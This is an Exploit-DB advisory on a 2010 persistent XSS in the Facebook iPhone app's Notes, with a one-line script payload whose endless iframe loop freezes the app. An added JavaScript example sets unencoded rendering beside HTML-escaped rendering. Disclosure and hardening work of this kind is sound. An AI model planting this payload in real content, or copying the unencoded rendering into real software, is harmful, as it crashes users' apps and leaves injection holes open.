Facebook for iPhone persistent XSS DoS

2010-01-03T00:00:00
ID EDB-ID:10947
Type exploitdb
Reporter marco_
Modified 2010-01-03T00:00:00

Description

Facebook for iPhone persistent XSS DoS. DoS exploit for the hardware platform.

                                        
Facebook for iPhone persistent XSS

The Facebook application for iPhone does not encode special characters in the Notes detail.

Adding this code to a note will freeze the application:
<script>var x = 'x'; while (1) { document.write('<iframe src="tel:'+x+'"></iframe>'); x = x + 'x'; }</script>
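
The missing output encoding described above, shown beside a hardened form, as an added example that is not part of the original advisory and is not Facebook's code. The helpers `renderNoteUnsafe`, `renderNoteSafe` and `containsActiveMarkup` and the note object layout are hypothetical; the advisory does not show how the app builds the Notes detail markup.

```javascript
// Added example: hypothetical rendering helpers, not the application's code.

// Characters that change meaning in HTML text and attribute contexts.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode untrusted text so the HTML parser treats it as character data.
// A single pass over the input avoids double-encoding the '&' of an entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Behaviour the advisory describes: note fields placed in markup unencoded.
function renderNoteUnsafe(note) {
  return '<div class="note"><h1>' + note.title + '</h1><p>' + note.body + '</p></div>';
}

// Hardened form: every user-controlled field is encoded at output time.
function renderNoteSafe(note) {
  return '<div class="note"><h1>' + escapeHtml(note.title) +
    '</h1><p>' + escapeHtml(note.body) + '</p></div>';
}

// True if the markup still contains an element that a note could inject.
function containsActiveMarkup(html) {
  return /<\s*(script|iframe)\b/i.test(html);
}

// Note body is the string from the advisory; the title is constructed.
const sampleNote = {
  title: 'Constructed sample note',
  body: `<script>var x = 'x'; while (1) { document.write('<iframe src="tel:'+x+'"></iframe>'); x = x + 'x'; }</script>`,
};

console.log('unsafe render keeps active markup:', containsActiveMarkup(renderNoteUnsafe(sampleNote)));
console.log('safe render keeps active markup:', containsActiveMarkup(renderNoteSafe(sampleNote)));
```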

App page: http://www.facebook.com/apps/application.php?id=6628568379
Download: http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=284882215&mt=8

marco_ <marcojetson@gmail.com>